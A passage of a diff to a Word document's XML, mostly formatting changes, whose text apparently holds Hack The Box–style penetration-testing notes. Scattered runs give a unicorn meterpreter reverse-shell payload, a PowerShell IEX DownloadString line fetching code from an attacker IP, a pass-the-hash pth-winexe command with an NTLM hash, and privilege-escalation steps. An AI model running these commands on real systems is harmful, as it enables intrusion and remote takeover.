           <w:highlight w:val="yellow"/>
         </w:rPr>
-        <w:t>-Drive into / directories and list all files</w:t>
+        <w:t>-find /root -type f 2&gt; /dev/null</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5133,6 +5406,7 @@
           <w:color w:val="FF0000"/>
           <w:highlight w:val="yellow"/>
         </w:rPr>
+        <w:t>-Drive into / directories and list all files</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5158,22 +5432,53 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
+        <w:rPr>
+          <w:b/>
           <w:b/>
           <w:bCs/>
           <w:color w:val="FF0000"/>
           <w:highlight w:val="yellow"/>
         </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="FF0000"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:b/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="FF0000"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="FF0000"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
         <w:t>Docker priv escalation</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:color w:val="000000"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -5408,7 +5713,9 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -5621,21 +5928,29 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Monaco;MonacoRegular;Courier Ne" w:hAnsi="Monaco;MonacoRegular;Courier Ne"/>
           <w:color w:val="004ED0"/>
           <w:sz w:val="21"/>
         </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco;MonacoRegular;Courier Ne" w:hAnsi="Monaco;MonacoRegular;Courier Ne"/>
+          <w:color w:val="004ED0"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
         <w:t xml:space="preserve">Extract .img file </w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco;MonacoRegular;Courier Ne" w:hAnsi="Monaco;MonacoRegular;Courier Ne"/>
+          <w:color w:val="004ED0"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -5749,8 +6064,9 @@
       <w:hyperlink r:id="rId14">
         <w:r>
           <w:rPr>
-            <w:rStyle w:val="InternetLink"/>
+            <w:rStyle w:val="ListLabel2"/>
             <w:color w:val="auto"/>
+            <w:u w:val="single"/>
           </w:rPr>
           <w:t>https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76</w:t>
         </w:r>
@@ -5782,13 +6098,16 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
         <w:rPr>
           <w:color w:val="3465A4"/>
           <w:highlight w:val="yellow"/>
         </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="3465A4"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
         <w:t>Methode 1 (for searching for possible exploits)</w:t>
       </w:r>
     </w:p>
@@ -5945,7 +6264,9 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -5987,39 +6308,31 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Monaco;MonacoRegular;Courier Ne" w:hAnsi="Monaco;MonacoRegular;Courier Ne"/>
           <w:color w:val="004ED0"/>
           <w:sz w:val="21"/>
           <w:highlight w:val="yellow"/>
         </w:rPr>
-        <w:t>Methode 2 (reverse shell with unicorn)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Monaco;MonacoRegular;Courier Ne" w:hAnsi="Monaco;MonacoRegular;Courier Ne"/>
           <w:color w:val="004ED0"/>
           <w:sz w:val="21"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>Methode 2 (reverse shell with unicorn)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
         <w:rPr>
           <w:rFonts w:ascii="Monaco;MonacoRegular;Courier Ne" w:hAnsi="Monaco;MonacoRegular;Courier Ne"/>
           <w:color w:val="004ED0"/>
           <w:sz w:val="21"/>
         </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -6027,7 +6340,6 @@
           <w:color w:val="004ED0"/>
           <w:sz w:val="21"/>
         </w:rPr>
-        <w:t>./unicorn.py windows/meterpreter/reverse_tcp  10.10.14.39 9876</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6045,43 +6357,34 @@
           <w:color w:val="004ED0"/>
           <w:sz w:val="21"/>
         </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
+        <w:t>./unicorn.py windows/meterpreter/reverse_tcp  10.10.14.39 9876</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
         <w:rPr>
           <w:rFonts w:ascii="Monaco;MonacoRegular;Courier Ne" w:hAnsi="Monaco;MonacoRegular;Courier Ne"/>
           <w:color w:val="004ED0"/>
           <w:sz w:val="21"/>
         </w:rPr>
-        <w:t>cp unicorn.rc and powershell_attack.txt to share</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Monaco;MonacoRegular;Courier Ne" w:hAnsi="Monaco;MonacoRegular;Courier Ne"/>
           <w:color w:val="004ED0"/>
           <w:sz w:val="21"/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
         <w:rPr>
           <w:rFonts w:ascii="Monaco;MonacoRegular;Courier Ne" w:hAnsi="Monaco;MonacoRegular;Courier Ne"/>
           <w:color w:val="004ED0"/>
           <w:sz w:val="21"/>
         </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -6089,7 +6392,7 @@
           <w:color w:val="004ED0"/>
           <w:sz w:val="21"/>
         </w:rPr>
-        <w:t>msfconsole -r unicorn.rc</w:t>
+        <w:t>cp unicorn.rc and powershell_attack.txt to share</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6112,6 +6415,41 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco;MonacoRegular;Courier Ne" w:hAnsi="Monaco;MonacoRegular;Courier Ne"/>
+          <w:color w:val="004ED0"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco;MonacoRegular;Courier Ne" w:hAnsi="Monaco;MonacoRegular;Courier Ne"/>
+          <w:color w:val="004ED0"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>msfconsole -r unicorn.rc</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco;MonacoRegular;Courier Ne" w:hAnsi="Monaco;MonacoRegular;Courier Ne"/>
+          <w:color w:val="004ED0"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco;MonacoRegular;Courier Ne" w:hAnsi="Monaco;MonacoRegular;Courier Ne"/>
+          <w:color w:val="004ED0"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
         <w:rPr/>
       </w:pPr>
       <w:r>
@@ -6134,40 +6472,48 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:bookmarkStart w:id="4" w:name="__DdeLink__1164_1853778511"/>
-      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Monaco;MonacoRegular;Courier Ne" w:hAnsi="Monaco;MonacoRegular;Courier Ne"/>
           <w:color w:val="004ED0"/>
           <w:sz w:val="21"/>
         </w:rPr>
-        <w:t>powershell -C IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.39/powershell_attack.txt')</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="4"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="4" w:name="__DdeLink__1164_1853778511"/>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Monaco;MonacoRegular;Courier Ne" w:hAnsi="Monaco;MonacoRegular;Courier Ne"/>
           <w:color w:val="004ED0"/>
           <w:sz w:val="21"/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
+        <w:t>powershell -C IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.39/powershell_attack.txt')</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="4"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
         <w:rPr>
           <w:rFonts w:ascii="Monaco;MonacoRegular;Courier Ne" w:hAnsi="Monaco;MonacoRegular;Courier Ne"/>
           <w:color w:val="004ED0"/>
           <w:sz w:val="21"/>
         </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco;MonacoRegular;Courier Ne" w:hAnsi="Monaco;MonacoRegular;Courier Ne"/>
+          <w:color w:val="004ED0"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco;MonacoRegular;Courier Ne" w:hAnsi="Monaco;MonacoRegular;Courier Ne"/>
+          <w:color w:val="004ED0"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -6216,48 +6562,60 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Monaco;MonacoRegular;Courier Ne" w:hAnsi="Monaco;MonacoRegular;Courier Ne"/>
           <w:color w:val="004ED0"/>
           <w:sz w:val="21"/>
         </w:rPr>
-        <w:t>Connexion with NTLM hash</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Monaco;MonacoRegular;Courier Ne" w:hAnsi="Monaco;MonacoRegular;Courier Ne"/>
           <w:color w:val="004ED0"/>
           <w:sz w:val="21"/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
+        <w:t>Connexion with NTLM hash</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
         <w:rPr>
           <w:rFonts w:ascii="Monaco;MonacoRegular;Courier Ne" w:hAnsi="Monaco;MonacoRegular;Courier Ne"/>
           <w:color w:val="004ED0"/>
           <w:sz w:val="21"/>
         </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr/>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Monaco;MonacoRegular;Courier Ne" w:hAnsi="Monaco;MonacoRegular;Courier Ne"/>
+          <w:color w:val="004ED0"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco;MonacoRegular;Courier Ne" w:hAnsi="Monaco;MonacoRegular;Courier Ne"/>
+          <w:b/>
           <w:b/>
           <w:bCs/>
           <w:color w:val="004ED0"/>
           <w:sz w:val="21"/>
           <w:highlight w:val="yellow"/>
         </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco;MonacoRegular;Courier Ne" w:hAnsi="Monaco;MonacoRegular;Courier Ne"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="004ED0"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
         <w:t>pth-winexe -U jeeves/Administrator%aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00    //10.10.10.63 cmd</w:t>
       </w:r>
     </w:p>
@@ -6281,30 +6639,19 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Monaco;MonacoRegular;Courier Ne" w:hAnsi="Monaco;MonacoRegular;Courier Ne"/>
           <w:color w:val="004ED0"/>
           <w:sz w:val="21"/>
         </w:rPr>
-        <w:t>There is an alternate data stream for the ​ hm.txt ​ file, which can be discovered with the command</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr/>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Monaco;MonacoRegular;Courier Ne" w:hAnsi="Monaco;MonacoRegular;Courier Ne"/>
           <w:color w:val="004ED0"/>
           <w:sz w:val="21"/>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-        <w:t>dir /R</w:t>
+        </w:rPr>
+        <w:t>There is an alternate data stream for the ​ hm.txt ​ file, which can be discovered with the command</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6314,6 +6661,7 @@
           <w:rFonts w:ascii="Monaco;MonacoRegular;Courier Ne" w:hAnsi="Monaco;MonacoRegular;Courier Ne"/>
           <w:color w:val="004ED0"/>
           <w:sz w:val="21"/>
+          <w:highlight w:val="yellow"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -6321,48 +6669,81 @@
           <w:rFonts w:ascii="Monaco;MonacoRegular;Courier Ne" w:hAnsi="Monaco;MonacoRegular;Courier Ne"/>
           <w:color w:val="004ED0"/>
           <w:sz w:val="21"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>dir /R</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
         <w:rPr>
           <w:rFonts w:ascii="Monaco;MonacoRegular;Courier Ne" w:hAnsi="Monaco;MonacoRegular;Courier Ne"/>
           <w:color w:val="004ED0"/>
           <w:sz w:val="21"/>
         </w:rPr>
-        <w:t>Reading the stream can be done with the command ​</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr/>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Monaco;MonacoRegular;Courier Ne" w:hAnsi="Monaco;MonacoRegular;Courier Ne"/>
           <w:color w:val="004ED0"/>
           <w:sz w:val="21"/>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-        <w:t>powershell Get-Content -Path "hm.txt" -Stream "root.txt"</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
         <w:rPr>
           <w:rFonts w:ascii="Monaco;MonacoRegular;Courier Ne" w:hAnsi="Monaco;MonacoRegular;Courier Ne"/>
           <w:color w:val="004ED0"/>
           <w:sz w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco;MonacoRegular;Courier Ne" w:hAnsi="Monaco;MonacoRegular;Courier Ne"/>
+          <w:color w:val="004ED0"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>Reading the stream can be done with the command ​</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco;MonacoRegular;Courier Ne" w:hAnsi="Monaco;MonacoRegular;Courier Ne"/>
+          <w:color w:val="004ED0"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco;MonacoRegular;Courier Ne" w:hAnsi="Monaco;MonacoRegular;Courier Ne"/>
+          <w:color w:val="004ED0"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>powershell Get-Content -Path "hm.txt" -Stream "root.txt"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco;MonacoRegular;Courier Ne" w:hAnsi="Monaco;MonacoRegular;Courier Ne"/>
+          <w:color w:val="004ED0"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco;MonacoRegular;Courier Ne" w:hAnsi="Monaco;MonacoRegular;Courier Ne"/>
+          <w:color w:val="004ED0"/>
+          <w:sz w:val="21"/>
           <w:highlight w:val="yellow"/>
         </w:rPr>
         <w:t>or</w:t>
@@ -6371,7 +6752,12 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco;MonacoRegular;Courier Ne" w:hAnsi="Monaco;MonacoRegular;Courier Ne"/>
+          <w:color w:val="004ED0"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -6486,7 +6872,9 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -6542,7 +6930,9 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -6580,7 +6970,9 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -6892,7 +7284,9 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -6904,7 +7298,9 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -6929,7 +7325,9 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -7008,7 +7406,9 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -7043,9 +7443,6 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
         <w:rPr>
           <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
           <w:color w:val="000000"/>
@@ -7054,6 +7451,16 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
         </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
         <w:t>search HttpFileServer</w:t>
       </w:r>
     </w:p>
@@ -7083,9 +7490,6 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
         <w:rPr>
           <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
           <w:color w:val="000000"/>
@@ -7094,15 +7498,22 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
         </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
         <w:t>or manually looking for http file server</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
         <w:rPr>
           <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
           <w:color w:val="000000"/>
@@ -7111,6 +7522,16 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
         </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
         <w:t>there is a python script to exploit</w:t>
       </w:r>
     </w:p>
@@ -7140,9 +7561,6 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
         <w:rPr>
           <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
           <w:color w:val="000000"/>
@@ -7151,6 +7569,16 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
         </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
         <w:t>sysinfo</w:t>
       </w:r>
     </w:p>
@@ -7180,7 +7608,14 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -7554,7 +7989,7 @@
       <w:hyperlink r:id="rId15">
         <w:r>
           <w:rPr>
-            <w:rStyle w:val="InternetLink"/>
+            <w:rStyle w:val="ListLabel5"/>
             <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
             <w:color w:val="000000"/>
             <w:kern w:val="2"/>
@@ -7581,7 +8016,7 @@
       <w:hyperlink r:id="rId16">
         <w:r>
           <w:rPr>
-            <w:rStyle w:val="InternetLink"/>
+            <w:rStyle w:val="ListLabel5"/>
             <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
             <w:color w:val="000000"/>
             <w:kern w:val="2"/>
@@ -7634,7 +8069,15 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:u w:val="none"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -7669,7 +8112,7 @@
       <w:hyperlink r:id="rId17">
         <w:r>
           <w:rPr>
-            <w:rStyle w:val="InternetLink"/>
+            <w:rStyle w:val="ListLabel5"/>
             <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
             <w:color w:val="000000"/>
             <w:kern w:val="2"/>
@@ -7697,9 +8140,6 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
         <w:rPr>
           <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
           <w:color w:val="000000"/>
@@ -7709,13 +8149,32 @@
           <w:u w:val="none"/>
           <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
         </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:u w:val="none"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
         <w:t>2-Clone one TicketNotification and rename it as ReverseShell for example</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:u w:val="none"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -7801,9 +8260,6 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
         <w:rPr>
           <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
           <w:color w:val="000000"/>
@@ -7813,13 +8269,6 @@
           <w:u w:val="none"/>
           <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
         </w:rPr>
-        <w:t xml:space="preserve">4-Choose Demo notification ps1 </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr/>
       </w:pPr>
       <w:r>
         <w:rPr>
